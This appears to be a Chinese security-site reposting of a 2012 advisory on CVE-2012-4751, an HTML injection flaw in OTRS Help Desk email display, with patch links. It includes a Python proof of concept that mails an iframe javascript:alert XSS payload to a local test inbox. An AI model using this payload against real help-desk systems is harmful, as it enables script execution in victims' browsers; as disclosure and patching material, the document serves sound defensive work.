首页 / 操作系统 / Linux / OTRS邮件体HTML注入漏洞(CVE-2012-4751)
发布日期:2012-10-17 更新日期:2012-10-21受影响系统: otrs OTRS Help Desk 3.x otrs OTRS Help Desk 2.x 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 56093 CVE ID: CVE-2012-4751OTRS Help Desk是开源资源服务管理解决方案。OTRS 2.4.15、3.0.17、3.1.11之前版本存在HTML注入漏洞,HTML电子邮件内传递的输入没有正确过滤即显示给用户,成功利用后可插入任意HTML和脚本代码并在受影响站点的用户浏览器中执行。<*来源:Mike Eduard
链接:http://znuny.com/en/#!/advisory/ZSA-2012-03 http://secunia.com/advisories/51031/ http://www.kb.cert.org/vuls/id/603276 http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-03/ *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python"""Author: Mike Eduard - Znuny - Enterprise Services for OTRS Product: OTRS Open Technology Real Services Version: 3.1.8, 3.1.9 and 3.1.10 Vendor Homepage: http://otrs.org CVE: 2012-4751Timeline: 03 Sep 2012: Vulnerability reported + fix to vendor 04 Sep 2012: Vulnerability reported to CERT 05 Sep 2012: Response received from CERT 28 Sep 2012: Update from vendor to have it fixed and released on 16 Oct 2012 16 Oct 2012: Update: vulnerability patched http://www.kb.cert.org/vuls/id/603276 http://znuny.com/#!/advisory/ZSA-2012-03 http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-03/ 17 Oct 2012: Public DisclosureInstalled On: Windows Server 2008 R2 & Open SUSE 12.1 Client Test OS: Window 7 Pro SP1 (x86) Browser Used: Firefox 14+16 & Opera 12.01Injection Point: HTML Email Injection Payload(s): 1: <iframe src=" javascript:alert("XSS Exploit");"></iframe>"""import smtplib, urllib2payload = """ <iframe src=" javascript:alert("XSS Exploit");"></iframe> """def sendMail(dstemail, frmemail, smtpsrv, username, password): msg = "From: hacker@znuny.local
" msg += "To: victim@victim.local
" msg += "Date: Today
" msg += "Subject: Offensive Security
" msg += "Content-type: text/html
" msg += "XSS" + payload + "
" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit()username = "hacker@znuny.local" password = "123456" dstemail = "victim@victim.local" frmemail = "hacker@znuny.local" smtpsrv = "127.0.0.1"print "[*] Sending Email" sendMail(dstemail, frmemail, smtpsrv, username, password)建议: -------------------------------------------------------------------------------- 厂商补丁:otrs ---- otrs已经为此发布了一个安全公告(security-advisory-2012-03)以及相应补丁:security-advisory-2012-03:Security Advisory 2012-03链接:http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-03/Ruby本地文件创建漏洞(CVE-2012-4522)ModSecurity多个消息解析安全绕过漏洞相关资讯 HTML注入漏洞 OTRS安全漏洞 OTRS
Symantec Security Information (07/05/2013 16:04:54)
易网时代-编程资源站